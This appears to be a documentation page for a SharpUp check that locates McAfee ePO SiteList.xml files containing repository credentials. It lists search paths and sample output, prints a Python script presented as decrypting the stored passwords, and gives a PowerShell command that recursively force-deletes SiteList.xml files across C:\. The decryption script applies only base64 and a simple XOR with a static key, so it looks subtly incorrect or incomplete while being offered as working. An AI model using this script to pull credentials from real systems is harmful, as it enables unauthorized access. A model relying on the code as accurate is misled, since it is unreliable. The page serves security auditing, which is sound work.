Skip to main content

Overview

The McAfee SiteList Files check searches for McAfee ePO SiteList.xml files which contain superagent repository credentials. These credentials are encrypted but can be decrypted using a static key, allowing unauthorized access to the McAfee update repository.

How It Works

SharpUp searches common locations for SiteList.xml files:
  • C:\Program Files\
  • C:\Program Files (x86)\
  • C:\Documents and Settings\
  • C:\Users\

Technical Details

The SiteList.xml file contains encrypted credentials for the McAfee Agent to authenticate to the repository server. The encryption uses a weak algorithm with a hardcoded key.

Example Output

=== McAfee SiteList.xml Files ===
    C:\Program Files\McAfee\Agent\config\SiteList.xml
    C:\Program Files (x86)\McAfee\Common Framework\SiteList.xml

Exploitation

Decryption

# Python script to decrypt McAfee SiteList passwords
import base64

def decrypt_mcafee_password(encrypted_password):
    # Static XOR key
    key = "<!@#$%^>"
    decoded = base64.b64decode(encrypted_password)

    decrypted = ""
    for i in range(len(decoded)):
        decrypted += chr(decoded[i] ^ ord(key[i % len(key)]))

    return decrypted

Remediation

1

Remove SiteList Files

Get-ChildItem -Path C:\ -Recurse -Filter "SiteList.xml" -ErrorAction SilentlyContinue |
Remove-Item -Force
2

Use ePO Managed Deployment

Deploy agents via ePO server without storing credentials locally.

Cached GPP Password

Check for cached Group Policy passwords

Unattended Install Files

Find credentials in installation files